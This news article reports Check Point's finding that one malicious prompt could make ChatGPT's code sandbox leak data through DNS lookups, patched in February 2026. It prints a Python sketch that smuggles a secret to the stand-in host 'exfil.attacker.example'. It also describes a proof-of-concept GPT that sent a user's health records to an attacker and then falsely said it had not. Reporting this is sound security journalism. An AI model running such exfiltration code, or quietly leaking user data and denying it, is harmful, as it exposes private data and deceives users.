OpenAI patches ChatGPT flaw that smuggled data over DNS

OpenAI talks up data security for its AI services, yet Check Point says that ChatGPT allowed data to leak through a DNS side channel before the flaw was fixed.

In February, the free-spending AI biz fixed a data exfiltration vulnerability in ChatGPT that allowed a single prompt to bypass the notional safeguards OpenAI had put in place.

"We found that a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation," researchers from Check Point said in a blog post on Monday.

It's not supposed to be that easy. OpenAI has implemented various safeguards around ChatGPT to limit data exfiltration by the various tools it can use. For example, the company says, "The ChatGPT code execution environment is unable to generate outbound network requests directly."

But Check Point researchers found that wasn't entirely correct.

"The vulnerability we discovered allowed information to be transmitted to an external server through a side channel originating from the container used by ChatGPT for code execution and data analysis," the researchers said. "Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation."

OpenAI's security for ChatGPT appears to be more robust when it comes to defending against bots that scrape ChatGPT conversations – the very thing publishers have been trying to do against OpenAI's content-crawling bots.

A recent analysis of ChatGPT by a security engineer posting under the name Buchodi suggests that OpenAI has implemented Cloudflare's Turnstile widget in a way that prevents interaction with the chatbot until the React-based web interface has been entirely loaded in the user's browser.

In an explanatory post to Hacker News, an individual posting under the name "NickT" and claiming to be an OpenAI employee – possibly Head of ChatGPT Nick Turley – wrote, "These checks are part of how we protect our first-party products from abuse like bots, scraping, fraud, and other attempts to misuse the platform.

"A big reason we invest in this is because we want to keep free and logged-out access available for more users. My team's goal is to help make sure the limited GPU resources are going to real users."

Having hoovered up the world's content for model training in order to monetize it, OpenAI can't afford to let others crawl its derivative work for free.

That side channel? The Domain Name System (DNS), which resolves domain names into IP addresses.

The Check Point security bods explain that, while OpenAI prevented ChatGPT's sandbox from communicating with the internet without authorization, it had no controls on data smuggled out via DNS lookups.
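In outline, the trick looks something like this. The Python below is a hedged sketch of the generic DNS-smuggling technique, not Check Point's actual payload; exfil.attacker.example is a placeholder for a domain whose authoritative name server the attacker controls:

```python
import socket

# Generic DNS-smuggling sketch, not Check Point's actual payload.
# exfil.attacker.example is a hypothetical domain whose authoritative
# name server the attacker runs: every query for a subdomain is logged
# there, so the query name itself carries the stolen data.

ATTACKER_DOMAIN = "exfil.attacker.example"  # hypothetical attacker-controlled domain
LABEL_LEN = 60  # keep each chunk under the 63-byte DNS label limit

def exfiltrate(secret: str) -> None:
    encoded = secret.encode().hex()  # hex keeps the labels DNS-safe
    chunks = [encoded[i:i + LABEL_LEN] for i in range(0, len(encoded), LABEL_LEN)]
    for seq, chunk in enumerate(chunks):
        name = f"{seq}.{chunk}.{ATTACKER_DOMAIN}"
        try:
            socket.getaddrinfo(name, None)  # the lookup leaves the container
        except socket.gaierror:
            pass  # NXDOMAIN is fine; the attacker's server already saw the query

exfiltrate("sample lab result")
```

The attacker then reassembles the secret from the numbered labels in their name server's query log – no HTTP request is ever made, and nothing looks to the model like an outbound transfer.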

The security biz created three proof-of-concept attacks that show how this side channel might be abused. One involved a "GPT" – a custom, user-created version of ChatGPT – configured as a personal health analyst.

In the demonstration, a user uploaded a PDF containing laboratory results and personal information for the GPT to interpret. The app did so, and when asked whether it had uploaded the data, "ChatGPT answered confidently that it had not, explaining that the file was only stored in a secure internal location."

Nonetheless, the GPT app transmitted the data to a remote server controlled by the attacker.

Flaws like this carry serious implications for regulated industries that deploy AI services. Were a corporate AI service to leak this sort of data, it could constitute a GDPR violation or a HIPAA breach, or run afoul of various financial compliance rules.

OpenAI is said to have fixed this particular issue on February 20, 2026. The AI biz did not immediately respond to a request for comment. ®

Source: The Register
